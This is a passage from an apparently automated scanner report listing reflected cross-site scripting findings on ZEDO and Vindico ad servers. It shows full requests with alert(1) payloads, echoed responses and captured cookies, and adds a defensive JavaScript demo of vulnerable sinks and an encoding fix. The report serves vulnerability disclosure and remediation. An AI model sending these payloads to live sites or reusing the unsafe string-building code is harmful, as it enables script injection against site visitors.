var zzuid='unknown';}
var zzSection=916;var zzPat='c0b04';alert(1)//36d8d5a78d7';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=c0b04';alert(1)//36d8d5a78d7;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b86"%3balert(1)//7be31572be0 was submitted in the q parameter. This input was echoed as f9b86";alert(1)//7be31572be0 in the application's response.

As in 1.132, the double quote does not break the single-quoted zzPat literal; the breakout is in the double-quoted zzStr literal, and the same caveat applies: the // comment removes the closing brace of the if block, so verify in a browser that the script still parses before counting this instance as exploitable.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=f9b86"%3balert(1)//7be31572be0&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:19 GMT
Connection: close
Content-Length: 4245

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='f9b86";alert(1)//7be31572be0';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=f9b86";alert(1)//7be31572be0;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                                                       
...[SNIP]...
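
The JavaScript-string findings above (1.128/1.129 and 1.131 through 1.135) share one sink type but do not all behave the same way in a browser, because what the trailing // comment removes differs. The following added example (not code from the report, ZEDO or the Des Moines Register) rebuilds a single-quoted sink modelled on the fm.js zzPat line and a double-quoted sink modelled on the 404 page's semantics object, compiles each generated script the way a browser would, and shows the encoding that closes both. The sink templates are approximations of the captured lines, alert() is replaced by a recorder, and the payloads are the captured ones after URL-decoding.

```javascript
// Added example, not code from the scanner report, ZEDO or the affected site.
// Two JavaScript-string sinks rebuilt from the captures, executed with a
// recorder in place of alert(), and the encoder that neutralizes both.

// Sink A, modelled on the fm.js line in 1.131/1.134: a single-quoted literal
// followed by more code on the same line.
function fmJsUnsafe(q) {
  return "var zzSection=916;var zzPat='" + q + "';var zzCustom='';";
}

// Sink B, modelled on the 404 page's semantics object in 1.128/1.129: a
// double-quoted literal nested inside object literals.
function semanticsUnsafe(url) {
  return 'var semantics={\n' +
         '  response:{"Url":"' + url + '","ContentLength":0},\n' +
         "  source:'CW'\n" +
         '};';
}

// Hardened encoder: emit the value as a JSON string literal, then escape what
// JSON leaves alone but still matters inside a script: '<' (so "</script>"
// cannot end an inline block) and U+2028/U+2029 (line terminators to
// pre-ES2019 parsers).
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function fmJsSafe(q) {
  return 'var zzSection=916;var zzPat=' + jsStringLiteral(q) + ";var zzCustom='';";
}
function semanticsSafe(url) {
  return 'var semantics={\n' +
         '  response:{"Url":' + jsStringLiteral(url) + ',"ContentLength":0},\n' +
         "  source:'CW'\n" +
         '};';
}

// Compile and run a generated script with alert() replaced by a recorder.
// Returns { alerts, error, value }: the alert arguments seen, the name of any
// exception (SyntaxError when the script does not parse at all), and the
// value of resultExpr after the script ran.
function runScript(src, resultExpr) {
  const alerts = [];
  const alert = (x) => { alerts.push(x); };   // stand-in for window.alert
  try {
    // The newline matters: a payload ending in '//' comments out the rest of
    // its own line, exactly as in the captured responses.
    const fn = new Function('alert', src + '\nreturn ' + resultExpr + ';');
    return { alerts, error: null, value: fn(alert) };
  } catch (e) {
    return { alerts, error: e.constructor.name, value: undefined };
  }
}

// The payloads as the server saw them, i.e. after %3b was decoded to ';'.
const PAYLOAD_SINGLE = "c0b04';alert(1)//36d8d5a78d7";   // from 1.134
const PAYLOAD_DOUBLE = '36671";alert(1)//1caaebcb5b0';   // from 1.128

// Stand-alone run: sink A executes the injected alert, sink B does not even
// parse, and both hardened versions hand the payload back as an inert string.
function demo() {
  return {
    sinkA_unsafe: runScript(fmJsUnsafe(PAYLOAD_SINGLE), 'zzPat'),
    sinkB_unsafe: runScript(semanticsUnsafe(PAYLOAD_DOUBLE), 'semantics.response.Url'),
    sinkA_safe:   runScript(fmJsSafe(PAYLOAD_SINGLE), 'zzPat'),
    sinkB_safe:   runScript(semanticsSafe(PAYLOAD_DOUBLE), 'semantics.response.Url'),
  };
}
```

The difference between the two unsafe results is the point of the caveats in 1.128, 1.132 and 1.135: an unencoded echo is a finding either way, but whether the injected statement actually executes depends on what else the // comment removes from the line. Encoding the value as a string literal makes the question moot for both sinks.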

1.136. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [adRotationId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the adRotationId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67d7d"><script>alert(1)</script>1b977e7ff4d was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

Sink: the src attribute of the tracking iframe in the response body. The 500 status does not reduce exploitability; the browser renders the returned HTML body regardless of the status code. Caveat on the proof of concept as shown: an HTML5 parser treats everything between an iframe start tag and the next </iframe> as raw text, so a <script> element injected immediately after closing the iframe start tag is not parsed as script by current browsers. The reflection is unencoded and the finding stands, but a payload that executes would first have to close the iframe element.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d"><script>alert(1)</script>1b977e7ff4d&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:35 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d"><script>alert(1)</script>1b977e7ff4d&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.137. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the bannerCreativeAdModuleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0260"><script>alert(1)</script>92954893223 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with adRotationId, the response is a 500 error page whose HTML body still carries the payload unencoded, so the status code does not lower the severity.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=c0260"><script>alert(1)</script>92954893223&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 2584
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:30 GMT
Connection: close
Vary: Accept-Encoding


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=c0260"><script>alert(1)</script>92954893223" Class = "TrackingFrame">
...[SNIP]...

1.138. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the campaignId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff6ed"><script>alert(1)</script>f91a4c37806 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Here the value lands in the pipe-delimited clickthrough URL inside an <A HREF> attribute; finding 1.139 shows the same parameter reaching the impression iframe's src attribute as well, so both sinks need encoding.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468ff6ed"><script>alert(1)</script>f91a4c37806&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:34 GMT
Connection: close
Content-Length: 3930


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<A HREF= "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|55|49160|6468ff6ed"><script>alert(1)</script>f91a4c37806|13047|21772|http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|2045|48337|6408|15311|21516|http://ad.doubleclick.net/clk;235677179;59315198;b;pc=[TPAS_ID]" TARGET="_BLANK">
...[SNIP]...

1.139. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the campaignId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 262c2"><script>alert(1)</script>cd018174bf0 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=262c2"><script>alert(1)</script>cd018174bf0&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:34 GMT
Connection: close
Content-Length: 3922


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=262c2"><script>alert(1)</script>cd018174bf0&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.140. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the siteId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b668a"><script>alert(1)</script>75e7f948bb9 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=b668a"><script>alert(1)</script>75e7f948bb9&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:31 GMT
Connection: close
Content-Length: 3926


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<iframe src = "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/?siteId=b668a"><script>alert(1)</script>75e7f948bb9&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772" Class = "TrackingFrame">
...[SNIP]...

1.141. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the siteId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5449"><script>alert(1)</script>4c565f3c010 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55e5449"><script>alert(1)</script>4c565f3c010&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Mon, 14 Feb 2011 01:40:31 GMT
Connection: close
Content-Length: 3930


<html>
<head>
<style>
img {
border : 0px;

...[SNIP]...
<A HREF= "http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|55e5449"><script>alert(1)</script>4c565f3c010|49160|6468|13047|21772|http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Clickthrough/?|2045|48337|6408|15311|21516|http://ad.doubleclick.net/clk;235677179;59315198;b;pc=[TPAS_ID]" TARGET="_BLANK
...[SNIP]...

1.142. http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp

Issue detail

The value of the syndicationOutletId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71bf0"><script>alert(1)</script>333ca5c3bc5 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The 500 status does not help here either: the payload is reflected into the iframe src attribute of the error page's own HTML body.

Request

GET /Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=71bf0"><script>alert(1)</script>333ca5c3bc5&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69 HTTP/1.1
Host: cache.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://syndicated.mondominishows.com/custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6%22%3E%3Cscript%3Ealert(1)%3C/script%3E69a7616f754
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
